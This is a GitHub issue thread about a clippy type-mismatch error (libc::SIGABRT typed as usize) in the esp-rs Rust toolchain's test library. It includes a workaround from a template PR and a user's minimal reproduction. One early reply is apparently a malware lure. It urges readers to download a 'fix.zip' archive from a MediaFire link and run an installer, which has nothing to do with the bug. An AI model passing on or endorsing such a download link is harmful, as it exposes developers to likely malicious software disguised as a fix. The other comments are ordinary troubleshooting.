esp-rs/rust #231: Clippy error in test_result.rs

armandas, 2024-08-25:
When I run clippy on my project, I get the following error:

```
error[E0308]: mismatched types
   --> /home/armandas/.rustup/toolchains/esp/lib/rustlib/src/rust/library/test/src/test_result.rs:102:18
    |
101 |         None => match status.signal() {
    |                       --------------- this expression has type `Option<i32>`
102 |             Some(libc::SIGABRT) => TestResult::TrFailed,
    |                  ^^^^^^^^^^^^^ expected `i32`, found `usize`
```

### Meta

`rustc --version --verbose`:
```
rustc 1.80.0-nightly (1b259e0b8 2024-07-22) (1.80.0.0)
binary: rustc
commit-hash: 1b259e0b8b2129dd3d62819a32f6d9b287e6b86c
commit-date: 2024-07-22
host: x86_64-unknown-linux-gnu
release: 1.80.0-nightly
LLVM version: 17.0.1

```

Zoraaa-z, 2024-08-25:
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

cs-clarence, 2024-10-10:
i have this issue too

gentean, 2024-10-23:
i have this issue too

MabezDev, 2024-10-28:
If someone could set up a min repro for me, that would be most useful.

closed 2024-10-29 by MabezDev

cs-clarence, 2024-11-10:
> @MabezDev
> 
> I was trying to reproduce it on the esp-idf-template, but could not. After checking the differences between my project and the template, I found the lines below. The change was added in May (PR: [esp-rs/esp-idf-template#212](https://github.com/esp-rs/esp-idf-template/pull/212)) and fixes the issue:
> 
> ```rust
> [[bin]]
> name = "project-name"
> harness = false # do not use the built in cargo test harness -> resolve rust-analyzer errors
> ```
> 
> As such, it's probably OK to close this?

still not fixed for me, i'm using an old project that worked before but not working now after i updated, i found a related pr for this https://github.com/esp-rs/rust/pull/232

i'm make a minimal repro but it's hard to pinpoint what exactly is causing it

cs-clarence, 2024-11-10:
i think i finally got a reproduction here

https://github.com/cs-clarence/esp-rs-min-repro

@MabezDev 

Steps to reproduce:
1. Generate a project `cargo generate esp-rs/esp-idf-template cargo`
2. Create a `lib.rs` in src folder
3. Restart rust analyzer

[image]